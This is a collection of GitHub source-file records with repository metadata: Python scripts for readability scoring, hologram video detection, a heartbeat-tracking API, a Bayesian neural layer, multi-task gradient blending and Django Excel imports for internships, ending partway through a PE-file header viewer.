+{"seq_id":"7558613555","text":"#!/usr/bin/env python3\n\nimport re\nfrom cs50 import get_string\n\n\ndef coleman_liau(L, S):\n index = 0.0588 * L - 0.296 * S - 15.8\n return index\n\n\ndef main():\n \n # init: string\n i = get_string(\"Text: \").strip().replace(\"!\", \".\").replace(\"?\", \".\")\n j = i.split(\".\")\n m = list(i)\n\n # compute\n number_of_letters = 0\n for _ in m:\n if _.isalpha():\n number_of_letters += 1\n number_of_sentences = len(j) - 1\n number_of_words = len(i.split(\" \"))\n x = (number_of_letters / number_of_words) * 100\n y = (number_of_sentences / number_of_words) * 100\n z = round(coleman_liau(x, y))\n print(number_of_letters, number_of_words, number_of_sentences, x, y, z)\n # return\n if z < 1:\n o = \"Before Grade 1\"\n elif z < 16:\n o = \"Grade {}\".format(z)\n elif z > 16:\n o = \"Grade 16+\"\n print(o)\n\nmain()\n","repo_name":"sjin09/CS50","sub_path":"pset/pset6/readability.py","file_name":"readability.py","file_ext":"py","file_size_in_byte":872,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72326531687","text":"import cv2\nimport holo_detector\nimport argparse\n\n\ndef get_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('--input_file', required=True, choices='blog_money.mp4 jangsion_id_card.mp4'.split(), help='Name of input mp4 file name')\n return parser.parse_args()\n\n\ndef main():\n args = get_args()\n\n file_name = args.input_file\n data_dir = '../data'\n infile = f'{data_dir}/input/{file_name}'\n mix_outfile = f'{data_dir}/mix_output/{file_name}'\n heatmap_outfile = f'{data_dir}/heatmap_output/{file_name}'\n\n if file_name == 'jangsion_id_card.mp4':\n width, height = 1920, 1080\n else:\n width, height = 1080, 640\n cap = cv2.VideoCapture(infile)\n cap.set(cv2.CAP_PROP_FRAME_WIDTH, 1920)\n cap.set(cv2.CAP_PROP_FRAME_HEIGHT, 1080)\n cap.set(cv2.CAP_PROP_AUTOFOCUS, 1)\n cap.set(cv2.CAP_PROP_FOCUS, 0)\n\n fps = cap.get(cv2.CAP_PROP_FPS)\n\n detector = holo_detector.HoloDetector(debug=True)\n fourcc = cv2.VideoWriter_fourcc(*'mp4v')\n mix_out = cv2.VideoWriter(mix_outfile, fourcc, round(fps), (width, height))\n heatmap_out = cv2.VideoWriter(heatmap_outfile, fourcc, round(fps), (width, height))\n\n while cap.isOpened():\n (ret, frame) = cap.read()\n if frame is None:\n break\n holo_mask, img_holo, img_hit = detector.detect_holos(frame)\n mix_out.write(img_holo)\n heatmap_out.write(img_hit)\n\n mix_out.release()\n heatmap_out.release()\n cap.release()\n cv2.destroyAllWindows()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"janguck/generate_data_for_hologram_detector","sub_path":"code/detect_holo.py","file_name":"detect_holo.py","file_ext":"py","file_size_in_byte":1541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10053868207","text":"# -*- coding:utf-8 -*-\nfrom .views.utils import get_qiniu_token\nfrom .views.utils import QINIU_URL\n\n\ndef user_dict(user):\n if not user:\n return None\n info = {\n 'id': user.id,\n 'name': user.name,\n 'phone': user.tel_num,\n 'content': user.content,\n 'avatar': user.avatar,\n 'openid': user.openid,\n 'qiniu_token': get_qiniu_token()\n }\n return info\n\n\ndef _restaurant_dict(res):\n info = {\n 'id': res.id,\n 'name': res.name,\n 'content': res.content,\n 'address': res.address,\n 'spicy_level': res.spicy_level.value if res.spicy_level is not None else '',\n 'cuisine': res.cuisine,\n 'images': [QINIU_URL + image.image_url for image in res.images]\n }\n return info\n\n\ndef restaurant_dict(ress):\n if isinstance(ress, list) or isinstance(ress, tuple):\n info = []\n for res in ress:\n info.append(_restaurant_dict(res))\n return info\n else:\n return _restaurant_dict(ress)","repo_name":"Yucheng-Ren/lunchplace","sub_path":"lunchapp/json_data.py","file_name":"json_data.py","file_ext":"py","file_size_in_byte":1020,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16497462037","text":"import pandas as pd\n\n\ndef dataframeDateAssign(df: pd.DataFrame, dateCol=\"pdate\"):\n df[dateCol] = pd.to_datetime(df[dateCol])\n dates = pd.date_range(start=df[dateCol].min(), end=df[dateCol].max())\n df = df.set_index(dateCol).reindex(dates, fill_value=0).reset_index()\n df[dateCol] = [str(i)[:10] for i in df[\"index\"]]\n df = df.drop(columns=[\"index\"])\n return df\n","repo_name":"zhuzhuyan93/streamlit-dashboard","sub_path":"tools/dateTool.py","file_name":"dateTool.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28644657267","text":"import uuid\nimport pathlib\nimport logging\nfrom typing import Optional\n\nfrom quart import Blueprint, request, jsonify as qjsonify, current_app as app\n\nfrom rana.auth import token_check\nfrom rana.errors import BadRequest\nfrom rana.models import validate, HEARTBEAT_MODEL\nfrom rana.utils import jsonify as jsonify\n\nlog = logging.getLogger(__name__)\nbp = Blueprint(\"heartbeats\", __name__)\n\n\nasync def fetch_machine(user_id, mach_name=None, *, app_=None) -> uuid.UUID:\n \"\"\"Return the Machine ID for the given request.\n Creates a new machine for the given user if the given\n X-Machine-Name value is new.\n \"\"\"\n app_ = app_ or app\n\n if mach_name is None:\n try:\n mach_name = request.headers[\"x-machine-name\"]\n except KeyError:\n mach_name = \"root\"\n\n mach_id = await app_.db.fetchval(\n \"\"\"\n select id from machines where name = $1 and user_id = $2\n \"\"\",\n mach_name,\n user_id,\n )\n\n if mach_id is not None:\n return mach_id\n\n mach_id = uuid.uuid4()\n\n await app_.db.execute(\n \"\"\"\n insert into machines (id, user_id, name)\n values ($1, $2, $3)\n \"\"\",\n mach_id,\n user_id,\n mach_name,\n )\n\n return mach_id\n\n\nEXTENSIONS = {\".zig\": \"Zig\"}\n\n\nasync def process_hb(user_id, machine_id, heartbeat, *, app_=None):\n \"\"\"Add a heartbeat.\"\"\"\n app_ = app_ or app\n heartbeat_id = uuid.uuid4()\n\n if heartbeat.get(\"language\") is None:\n entity_path = heartbeat[\"entity\"]\n\n if entity_path.lower().startswith(\"c:\"):\n path = pathlib.PureWindowsPath(entity_path)\n else:\n path = pathlib.PurePosixPath(entity_path)\n\n heartbeat[\"language\"] = EXTENSIONS.get(path.suffix)\n\n existing_hb = await app_.db.fetchval(\n \"\"\"\n select id from heartbeats\n where entity = $1 and abs(($2 - time)::bigint) < 60\n limit 1\n \"\"\",\n heartbeat[\"entity\"],\n heartbeat[\"time\"],\n )\n\n if existing_hb:\n existing = await app_.db.fetch_heartbeat_simple(existing_hb)\n log.debug(\n \"found close heartbeat: %r %r dt=%r\",\n existing[\"time\"],\n heartbeat[\"time\"],\n existing[\"time\"] - heartbeat[\"time\"],\n )\n return existing\n\n log.debug(\n \"add heartbeat %r: uid=%r entity=%r lang=%r\",\n heartbeat_id.hex,\n user_id.hex,\n heartbeat[\"entity\"],\n heartbeat[\"language\"],\n )\n\n await app_.db.execute(\n \"\"\"\n insert into heartbeats (id, user_id, machine_id,\n entity, type, category, time,\n is_write, project, branch, language, lines, lineno, cursorpos)\n values\n ($1, $2, $3,\n $4, $5, $6,\n $7, $8, $9,\n $10, $11, $12,\n $13, $14)\n \"\"\",\n heartbeat_id,\n user_id,\n machine_id,\n heartbeat[\"entity\"],\n heartbeat[\"type\"],\n heartbeat[\"category\"],\n heartbeat[\"time\"],\n heartbeat[\"is_write\"],\n heartbeat[\"project\"],\n heartbeat[\"branch\"],\n heartbeat[\"language\"],\n heartbeat[\"lines\"],\n heartbeat[\"lineno\"],\n heartbeat[\"cursorpos\"],\n )\n\n return await app_.db.fetch_heartbeat_simple(heartbeat_id)\n\n\n@bp.route(\"/current/heartbeats\", methods=[\"POST\"])\nasync def post_heartbeat():\n user_id = await token_check()\n raw_json = await request.get_json()\n j = validate(raw_json, HEARTBEAT_MODEL)\n\n machine_id = await fetch_machine(user_id)\n heartbeat = await process_hb(user_id, machine_id, j)\n return jsonify(heartbeat), 201\n\n\n@bp.route(\"/current/heartbeats.bulk\", methods=[\"POST\"])\nasync def post_many_heartbeats():\n user_id = await token_check()\n\n raw_json = await request.get_json()\n if not isinstance(raw_json, list):\n raise BadRequest(\"no heartbeat list provided\")\n\n j = validate(\n {\"hbs\": raw_json},\n {\n \"hbs\": {\n \"type\": \"list\",\n \"schema\": {\"type\": \"dict\", \"schema\": HEARTBEAT_MODEL},\n }\n },\n )[\"hbs\"]\n\n machine_id = await fetch_machine(user_id)\n log.debug(\"adding %d heartbeats\", len(j))\n\n res = []\n for heartbeat in j:\n res.append(await process_hb(user_id, machine_id, heartbeat))\n\n return qjsonify({\"responses\": res}), 201\n","repo_name":"lun-4/rana","sub_path":"rana/blueprints/heartbeats.py","file_name":"heartbeats.py","file_ext":"py","file_size_in_byte":4329,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"19600549091","text":"import paddle\nfrom paddle import Tensor\nfrom .misc import BayesianModule\nimport paddle.nn.functional as F\nfrom paddle.nn.initializer import Uniform\nfrom model.samplers import GaussianVariational,ScaleMixture\n\nclass BayesLinear(BayesianModule):\n\n \"\"\"Bayesian Linear Layer.\n\n Implementation of a Bayesian Linear Layer as described in the\n 'Weight Uncertainty in Neural Networks' paper.\n \"\"\"\n\n def __init__(self,\n in_features: int,\n out_features: int,\n bias=True,\n params=None,) -> None:\n\n \"\"\"Bayesian Linear Layer.\n\n Parameters\n ----------\n in_features : int\n Number of features to feed in to the layer.\n out_features : out\n Number of features produced by the layer.\n bias: bool\n Is contain bias.\n params:\n prior_pi : float\n Pi weight to be used for the ScaleMixture prior.\n prior_sigma1 : float\n Sigma for the first normal distribution in the prior.\n prior_sigma2 : float\n Sigma for the second normal distribution in the prior.\n ...\n \"\"\"\n\n super().__init__()\n if params is None:\n params = {\n # 先验P(w),用mixture得到\n 'prior_pi': 0.5,\n 'prior_sigma1': 1.0, # -lnσ1=0\n 'prior_sigma2': 0.0025, # -lnσ2≈6\n # 近似后验q(w|θ),用来初始化mu和rho\n 'posterior_mu_initial': [-0.2, 0.2], # mean std\n 'posterior_rho_initial': [-5.0, -4.0],\n }\n # 初始化\n uniform_mu_= Uniform(*params['posterior_mu_initial'])\n uniform_rho_=Uniform(*params['posterior_rho_initial'])\n\n w_mu = paddle.empty(shape=[in_features,out_features])\n w_rho = paddle.empty(shape=[in_features,out_features])\n uniform_mu_(w_mu)\n uniform_rho_(w_rho)\n if bias:\n bias_mu = paddle.empty(shape=[out_features,])\n bias_rho = paddle.empty(shape=[out_features,])\n uniform_mu_(bias_mu)\n uniform_rho_(bias_rho)\n # 后验概率采样器(P(w|θ))\n self.w_posterior = GaussianVariational(w_mu, w_rho)\n self.bias_posterior = GaussianVariational(bias_mu, bias_rho)\n # 先验概率采样器 (P(w))\n self.w_prior = ScaleMixture(params['prior_pi'],params['prior_sigma1'], params['prior_sigma2'])\n if bias:\n self.bias_prior = ScaleMixture(params['prior_pi'],params['prior_sigma1'], params['prior_sigma2'])\n\n self.kl_divergence = 0.0\n\n def forward(self, x: Tensor) -> Tensor:\n\n \"\"\"Calculates the forward pass through the linear layer.\n\n Parameters\n ----------\n x : Tensor\n Inputs to the Bayesian Linear layer.\n\n Returns\n -------\n Tensor\n Output from the Bayesian Linear layer.\n \"\"\"\n\n w = self.w_posterior.sample()\n b = self.bias_posterior.sample()\n\n w_log_prior = self.w_prior.log_prior(w)\n b_log_prior = self.bias_prior.log_prior(b)\n\n w_log_posterior = self.w_posterior.log_posterior()\n b_log_posterior = self.bias_posterior.log_posterior()\n\n total_log_prior = w_log_prior + b_log_prior # prior =w和b的prior总和\n total_log_posterior = w_log_posterior + b_log_posterior\n self.kl_divergence = self.kld(total_log_prior, total_log_posterior)\n\n return F.linear(x, w, b)\n\n def kld(self, log_prior: Tensor, log_posterior: Tensor) -> Tensor:\n\n \"\"\"Calculates the KL Divergence. (其实是计算-ELBO,最小化kl散度=最大化ELBO)\n\n Uses the weight sampled from the posterior distribution to\n calculate the KL Divergence between the prior and posterior.\n\n Parameters\n ----------\n log_prior : Tensor\n Log likelihood drawn from the prior.\n log_posterior : Tensor\n Log likelihood drawn from the approximate posterior.\n\n Returns\n -------\n Tensor\n Calculated KL Divergence.\n \"\"\"\n\n return log_posterior - log_prior\n","repo_name":"jiaohuix/Bayes_backprop_paddle","sub_path":"bayes_elbo_paddle/model/layers/bayes_linear.py","file_name":"bayes_linear.py","file_ext":"py","file_size_in_byte":4199,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20555910701","text":"def add(dic, new_dic):\n \"\"\"\n Add important data here with try/except clauses..\n \"\"\"\n # TODO: Include the most important fields with try/except clauses\n\n # Add organization info: country, city, street and organization\n try:\n l_organization_info = []\n if dic['Num_of_organizations'] >= 1:\n for i in range(dic['Num_of_organizations']):\n key_string_country = \"Organization_country\"+str(i)\n key_string_city = \"Organization_city\" + str(i)\n key_string_street = \"Organization_street\" + str(i)\n key_string_organization = \"Organization_org\" + str(i)\n\n # l_individual = [country, city, street, organization]\n if len(dic[key_string_organization]) > 1:\n l_individual_org = [dic[key_string_country], dic[key_string_city], dic[key_string_street], dic[key_string_organization][1]]\n elif len(dic[key_string_organization]) == 1:\n l_individual_org = [dic[key_string_country], dic[key_string_city], dic[key_string_street], dic[key_string_organization][0]]\n else:\n l_individual_org = [dic[key_string_country], dic[key_string_city], dic[key_string_street], dic[key_string_organization]]\n l_organization_info.append(l_individual_org)\n\n new_dic['Organization_info'] = l_organization_info\n except:\n print(\"No 'Organization_info' found..\")\n\n # Add publication info\n try:\n if dic['full_address']:\n l = dic['full_address'].split(\",\")\n for i, item in enumerate(l):\n l[i] = item.strip()\n\n # Add as list = [street, city, country, full_name]\n try:\n if dic['city']:\n l[1] = dic['city']\n except:\n print(\"No 'city' found in publication info..\")\n try:\n if dic['full_name']:\n l.append(dic['full_name'])\n except:\n print(\"No 'full_name' found in publication info\")\n except:\n print(\"No (publication) 'info' found..\")\n\n # Try publication city\n try:\n if dic[\"city\"]:\n new_dic[\"Publication_city\"] = dic[\"city\"]\n except:\n print(\"No (publication) 'city' found..\")\n\n # Add state\n try:\n new_dic[\"State\"] = dic[\"state\"]\n except:\n print(\"No 'state' found...\")\n\n # Add street\n try:\n new_dic[\"Street\"] = dic[\"street\"]\n except:\n print(\"No (publication) 'street' found..\")\n\n # Add authors\n try:\n l = []\n if dic[\"Num_of_authors\"] >= 1:\n for i in range(dic[\"Num_of_authors\"]):\n author_key = \"Author_name\" + str(i)\n l.append(dic[author_key])\n new_dic[\"Authors\"] = l\n except:\n print(\"No 'Authors' found\")\n\n # Add heading..\n try:\n new_dic[\"Heading\"] = dic['heading']\n except:\n print(\"No 'heading' found..\")\n\n # Add publication type\n try:\n new_dic[\"Publication_type\"] = dic['pubtype']\n except:\n print(\"No 'pubtype' found..\")\n\n # Add publication month\n try:\n new_dic['Publication_month'] = dic['pubmonth']\n except:\n print(\"No 'pubmonth' found..\")\n\n # Add document type\n try:\n new_dic[\"Document_type\"] = dic[\"doctype\"]\n except:\n print(\"No 'doctype' found..\")\n\n # Add keyword\n try:\n new_dic[\"Keywords\"] = dic[\"keyword\"]\n except:\n print(\"No 'keyword' found..\")\n\n # Add pagecount\n try:\n new_dic[\"Page_count\"] = dic['page_count']\n except:\n print(\"No 'page_count' found\")\n\n # Add subject\n try:\n new_dic[\"Subject\"] = dic[\"subject\"]\n except:\n print(\"No 'subject' found...\")\n\n # Add UID\n try:\n new_dic[\"UID\"] = dic[\"UID\"]\n except:\n print(\"No 'UID' found..\")\n\n # Add volume\n try:\n new_dic[\"Vol\"] = dic['vol']\n except:\n print(\"No 'vol' found..\")\n\n # Add organization\n try:\n new_dic[\"Organization\"] = dic[\"organization\"]\n except:\n print(\"No 'organization' found..\")\n\n # Add issue (whatever that is..)\n try:\n new_dic[\"Issue\"] = dic[\"issue\"]\n except:\n print(\"No 'issue' found..\")\n\n return new_dic","repo_name":"petterasla/IECCS","sub_path":"Information Retrieval/Meta data/Wos Meta/v1/adder.py","file_name":"adder.py","file_ext":"py","file_size_in_byte":4309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3701290748","text":"import torch, copy\nimport numpy as np \nfrom collections import defaultdict\nfrom scripts.descent_dir.directions import Directions\nfrom torch.nn.utils import parameters_to_vector, vector_to_parameters\n\nclass GradHistory(Directions):\n MAX_BATCH_ITER = 10 \n def __init__(self, tasks, alpha):\n super().__init__(tasks)\n self._init_grad_history()\n self.alpha=alpha\n\n def _init_grad_history(self):\n \"\"\" Initialize variables\"\"\"\n\n self.grad_accumulation = defaultdict(list)\n self.squared_grad_accumulation = defaultdict(list)\n self.previous_grad = defaultdict(list)\n self.iterations = 0\n self.grad_mean_prev = []\n\n def _accumulate_gradient_vector_slide(self, grad_vector:dict)->None:\n\n if self.iterations == 0:\n self.grad_accumulation = {t: torch.zeros(self.MAX_BATCH_ITER) for t in self.tasks}\n \n idx = self.iterations%self.MAX_BATCH_ITER\n for t in self.tasks:\n self.grad_accumulation[t][idx] = torch.norm(parameters_to_vector(grad_vector[t]))\n\n def _compute_tension(self,parametrization):\n a=self.alpha\n tension = (a/(1+np.exp(-parametrization*np.exp(1)+np.exp(1)))+1-a)\n return max(0, tension)\n\n\n def _angle_between_vectors(self, vector1, vector2):\n\n # input: vector parameters \n rad = torch.arccos(torch.dot(vector1, vector2)/(torch.norm(vector1)*torch.norm(vector2))).item()\n return rad\n\n def descent_direction(self, grad_params: dict, loss=None)->list:\n \n # Compute common direction between tasks (center direction)\n new_dir = self._descent_direction(grad_params, self.tasks)\n\n self._accumulate_gradient_vector_slide(grad_params)\n self.iterations += 1 \n\n if self.iterations>=self.MAX_BATCH_ITER:\n # compute mean of gradients\n grad_accumulation_mean = {t: torch.sum(self.grad_accumulation[t]) for t in self.tasks}\n\n if self.grad_mean_prev:\n tmp_grad = copy.deepcopy(grad_params[self.tasks[0]])\n bisec_vector = parameters_to_vector(new_dir)\n tension_vector = []\n vector_param = defaultdict(list)\n for t in self.tasks:\n\n # Compute relative change\n vector_param[t] = parameters_to_vector(grad_params[t])\n grad_parametrization = grad_accumulation_mean[t]/self.grad_mean_prev[t] + np.log10(loss[t])\n \n # Compute tension factor\n tension_task = self._compute_tension(grad_parametrization.item())\n\n # Compute tensions of each task\n diff_vec = vector_param[t]-bisec_vector\n unit_vector = diff_vec/torch.norm(diff_vec)\n\n if tension_vector == []:\n tension_vector = unit_vector*tension_task\n else:\n tension_vector += unit_vector*tension_task\n\n # Get new descent direction\n tension_vector = bisec_vector + tension_vector\n \n ########################\n ###### check direction\n ##############################\n for t in self.tasks:\n angle = self._angle_between_vectors(vector_param[t], tension_vector)*180/np.pi\n if angle>90:\n unit_vector_param = vector_param[t]/torch.norm(vector_param[t])\n w = tension_vector - torch.dot(tension_vector, unit_vector_param)*unit_vector_param\n w_unit = w/torch.norm(w)\n alpha_angle = np.pi-self._angle_between_vectors(vector_param[t], (tension_vector-vector_param[t]))\n tension_vector = np.tan(alpha_angle)*torch.norm(vector_param[t])*w_unit\n \n ##########################################\n\n vector_to_parameters(tension_vector, tmp_grad)\n new_dir = tmp_grad\n vector_param = []\n tmp_grad = []\n tension_vector = []\n\n self.grad_mean_prev = grad_accumulation_mean\n \n return new_dir\n\n\nif __name__ == \"__main__\":\n \n tasks = ['a', 'b']\n alpha = 0.0\n directions = GradHistory(tasks, alpha)\n\n loss = {}\n loss['a'] = 1.2\n loss['b'] = 1.6\n\n grads = {}\n grads['a'] = torch.tensor([[1., 2., 3.], [4., 5., 6.]])\n grads['b'] = torch.tensor([[7.,8.,9.], [10.,11.,12.]])\n\n\n common_dir = directions.descent_direction(grads, loss)\n\n print(common_dir)","repo_name":"tiemink/MTL_TaskTensioner","sub_path":"scripts/descent_dir/history_directions.py","file_name":"history_directions.py","file_ext":"py","file_size_in_byte":4650,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"32366377288","text":"import openpyxl\nfrom django.contrib import messages\nfrom django.contrib.auth.decorators import login_required, permission_required\nfrom django.core.urlresolvers import reverse\nfrom django.http import HttpResponseRedirect\nfrom django.shortcuts import get_object_or_404\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.views.decorators.http import require_http_methods\n\nfrom internship import models as mdl\nfrom internship.models.cohort import Cohort\nfrom internship.models.internship import Internship\n\n\nfrom internship.models.period import Period\n@require_http_methods(['POST'])\n@login_required\n@permission_required('internship.is_internship_manager', raise_exception=True)\ndef upload_places_file(request, cohort_id):\n cohort = get_object_or_404(Cohort, pk=cohort_id)\n file_name = request.FILES['file']\n if file_name is not None:\n if \".xls\" not in str(file_name):\n messages.add_message(request, messages.ERROR, _('file_must_be_xls'))\n else:\n _save_xls_place(file_name, request.user, cohort)\n\n return HttpResponseRedirect(reverse('internships_places', kwargs={\n 'cohort_id': cohort.id\n }))\n\n\ndef _save_xls_place(file_name, user, cohort):\n workbook = openpyxl.load_workbook(file_name, read_only=True)\n worksheet = workbook.active\n col_reference = 0\n col_name = 1\n col_address = 2\n col_postal_code = 3\n col_city = 4\n col_country = 5\n col_url = 6\n\n # Iterates over the lines of the spreadsheet.\n for count, row in enumerate(worksheet.rows):\n if row[col_reference].value is None \\\n or row[col_reference].value == 0 \\\n or not _is_registration_id(row[col_reference].value):\n continue\n\n reference = \"\"\n if row[col_reference].value < 10:\n reference = \"0\"+str(row[col_reference].value)\n else:\n reference = str(row[col_reference].value)\n\n place = mdl.organization.search(reference=reference)\n if place:\n organization = mdl.organization.find_by_id(place[0].id)\n else:\n organization = mdl.organization.Organization(cohort=cohort)\n\n if row[col_reference].value:\n reference = \"\"\n if int(row[col_reference].value) < 10:\n reference = \"0\"+str(row[col_reference].value)\n else:\n reference = str(row[col_reference].value)\n organization.reference = reference\n else:\n organization.reference = None\n\n if row[col_name].value:\n organization.name = row[col_name].value\n organization.acronym = row[col_name].value[:14]\n else:\n organization.name = None\n organization.acronym = None\n\n if row[col_url].value:\n organization.website = row[col_url].value\n else:\n organization.website = \"\"\n\n organization.type = \"service partner\"\n\n organization.save()\n\n if place:\n organization_address = mdl.organization_address.search(organization=organization)\n if not organization_address:\n organization_address = mdl.organization_address.OrganizationAddress()\n else:\n organization_address = organization_address[0]\n else:\n organization_address = mdl.organization_address.OrganizationAddress()\n\n if organization:\n organization_address.label = \"Addr\"+organization.name[:14]\n else:\n organization_address.label = \" \"\n\n if row[col_address].value:\n organization_address.location = row[col_address].value\n else:\n organization_address.location = \" \"\n\n if row[col_postal_code].value:\n organization_address.postal_code = row[col_postal_code].value\n else:\n organization_address.postal_code = \" \"\n\n if row[col_city].value:\n organization_address.city = row[col_city].value\n else:\n organization_address.city = \" \"\n\n if row[col_country].value:\n organization_address.country = row[col_country].value\n else:\n organization_address.country = \" \"\n organization_address.organization = organization\n organization_address.latitude = None\n organization_address.longitude = None\n organization_address.save()\n\n\ndef _is_registration_id(registration_id):\n try:\n int(registration_id)\n return True\n except ValueError:\n return False\n\n\n@login_required\ndef upload_internships_file(request, cohort_id):\n cohort = get_object_or_404(Cohort, pk=cohort_id)\n if request.method == 'POST':\n file_name = request.FILES['file']\n data = request.POST\n internship_id = data[\"internship_id\"]\n if internship_id != \"\":\n internship = Internship.objects.filter(pk=internship_id).first()\n else:\n internship = None\n\n if file_name is not None:\n if \".xls\" not in str(file_name):\n messages.add_message(request, messages.ERROR, _('file_must_be_xls'))\n else:\n __save_xls_internships(request, file_name, request.user, cohort, internship)\n\n return HttpResponseRedirect(reverse('internships', kwargs={'cohort_id': cohort.id}))\n\n\ndef __save_xls_internships(request, file_name, user, cohort, internship):\n workbook = openpyxl.load_workbook(file_name, read_only=True)\n worksheet = workbook.active\n col_reference = 0\n col_spec = 1\n col_master = 2\n # Iterates over the lines of the spreadsheet.\n for count, row in enumerate(worksheet.rows):\n if row[col_reference].value is None \\\n or row[col_reference].value == 0 \\\n or not _is_registration_id(row[col_reference].value):\n continue\n\n if row[col_spec].value is not None:\n check_internship = 0\n if row[col_reference].value:\n reference = \"\"\n if int(row[col_reference].value) < 10:\n reference = \"0\"+str(row[col_reference].value)\n else :\n reference = str(row[col_reference].value)\n organization = mdl.organization.search(reference=reference, cohort=cohort)\n # internship.organization = organization[0]\n\n if len(organization) > 0:\n\n spec_value = row[col_spec].value\n spec_value = spec_value.replace(\" \", \"\")\n spec_value = spec_value.replace(\"*\", \"\")\n\n master_value = row[col_master].value\n\n if internship != None and internship.speciality != None:\n speciality = mdl.internship_speciality.search(pk=internship.speciality_id)\n else:\n speciality = mdl.internship_speciality.search(acronym__exact=spec_value, cohort=cohort)\n\n number_place = 0\n periods = mdl.period.Period.objects.filter(cohort=cohort)\n number_period = 1\n for x in range(3, len(periods) + 3):\n if row[x].value is None:\n number_place += 0\n else:\n number_place += int(row[x].value)\n\n for x in range(0, len(speciality)):\n check_internship_offer = mdl.internship_offer.InternshipOffer.objects.filter(speciality=speciality[x],\n organization__reference=organization[0].reference, cohort=cohort)\n if len(check_internship_offer) != 0:\n internship_offer = mdl.internship_offer.find_intership_by_id(check_internship_offer.first().id)\n else:\n internship_offer = mdl.internship_offer.InternshipOffer()\n\n internship_offer.organization = organization[0]\n internship_offer.speciality = speciality[x]\n internship_offer.title = speciality[x].name\n internship_offer.maximum_enrollments = number_place\n internship_offer.master = master_value\n internship_offer.cohort = cohort\n internship_offer.internship = internship\n internship_offer.selectable = True\n internship_offer.save()\n\n number_period = 1\n for x in range(3, len(periods) + 3):\n period_search = \"P\" + str(number_period)\n number_period += 1\n period = mdl.period.search(name__exact=period_search, cohort=cohort).first()\n check_relation = mdl.period_internship_places.PeriodInternshipPlaces.objects.filter(period=period, internship_offer=internship_offer)\n\n if len(check_relation) != 0:\n relation = mdl.period_internship_places.find_by_id(check_relation.first().id)\n else:\n relation = mdl.period_internship_places.PeriodInternshipPlaces()\n\n relation.period = period\n relation.internship_offer = internship_offer\n if row[x].value is None:\n relation.number_places = 0\n else:\n relation.number_places = int(row[x].value)\n relation.save()\n\n\n@require_http_methods(['POST'])\n@login_required\n@permission_required('internship.is_internship_manager', raise_exception=True)\ndef upload_masters_file(request, cohort_id):\n cohort = get_object_or_404(Cohort, pk=cohort_id)\n file_name = request.FILES['file']\n if file_name is not None:\n if \".xls\" not in str(file_name):\n messages.add_message(request, messages.ERROR, _('file_must_be_xls'))\n else:\n __save_xls_masters(request, file_name, request.user)\n\n return HttpResponseRedirect(reverse('internships_masters', kwargs={\n 'cohort_id': cohort.id\n }))\n\n\n@login_required\ndef __save_xls_masters(request, file_name, user):\n workbook = openpyxl.load_workbook(file_name, read_only=True)\n worksheet = workbook.active\n\n col_reference = 2\n col_firstname = 3\n col_lastname = 4\n col_mail = 7\n col_organization_reference = 6\n col_civility = 0\n col_mastery = 1\n col_speciality = 5\n\n # Iterates over the lines of the spreadsheet.\n for count, row in enumerate(worksheet.rows):\n check_reference = str(row[col_reference].value).strip(' ')\n if check_reference == \"\":\n check_reference = \"000\"\n if check_reference is None:\n check_reference = \"000\"\n\n if not _is_registration_id(check_reference):\n continue\n\n if row[col_firstname].value and row[col_lastname].value:\n master_check = mdl.internship_master.search(first_name=row[col_firstname].value,\n last_name=row[col_lastname].value)\n if len(master_check) == 0:\n master = mdl.internship_master.InternshipMaster()\n else:\n master = master_check[0]\n\n if row[col_organization_reference].value:\n reference = \"\"\n check_reference = row[col_organization_reference].value.strip(' ')\n if check_reference != \"\":\n if check_reference[0][0] != \"0\":\n if int(check_reference) < 10:\n reference = \"0\"+str(check_reference)\n else:\n reference = str(check_reference)\n else:\n reference = str(check_reference)\n\n organization = mdl.organization.search(reference=reference)\n master.organization = organization[0]\n else:\n master.organization = None\n if row[col_firstname].value:\n master.first_name = row[col_firstname].value\n else:\n master.first_name = \" \"\n\n if row[col_lastname].value:\n master.last_name = row[col_lastname].value\n else:\n master.last_name = \" \"\n\n if row[col_reference].value:\n master.reference = row[col_reference].value\n else:\n master.reference = \" \"\n\n if row[col_civility].value:\n master.civility = row[col_civility].value\n else:\n master.civility = \" \"\n\n if row[col_mastery].value:\n master.type_mastery = row[col_mastery].value\n else:\n master.type_mastery = \" \"\n\n if row[col_speciality].value:\n master.speciality = row[col_speciality].value\n else:\n master.speciality = \" \"\n\n master.save()\n","repo_name":"surumen/student-information-system","sub_path":"internship/utils/upload_xls.py","file_name":"upload_xls.py","file_ext":"py","file_size_in_byte":13010,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70034830249","text":"import PySide6.QtWidgets as QtWidgets\n\nfrom .. import helpers\nfrom .. import pe_file\nfrom .components import table\n\n\nclass HeadersView(QtWidgets.QScrollArea):\n NAME = \"Headers\"\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n # Set up scroll area\n self.setWidgetResizable(True)\n self.scroll_area = QtWidgets.QWidget(self)\n self.setWidget(self.scroll_area)\n self.scroll_area.setLayout(QtWidgets.QFormLayout())\n\n # DOS Header\n self.dos_header_group = table.TableGroup(\n \"DOS Header\", fit_columns=True, headers=[\"Name\", \"Description\", \"Value\"]\n )\n self.scroll_area.layout().addWidget(self.dos_header_group)\n\n # COFF File Header\n self.file_header_group = table.TableGroup(\n \"File Header\", fit_columns=True, headers=[\"Name\", \"Value\"]\n )\n self.scroll_area.layout().addWidget(self.file_header_group)\n\n # Optional Header\n self.optional_header_group = table.TableGroup(\n \"Optional Header\", fit_columns=True, headers=[\"Name\", \"Value\"]\n )\n 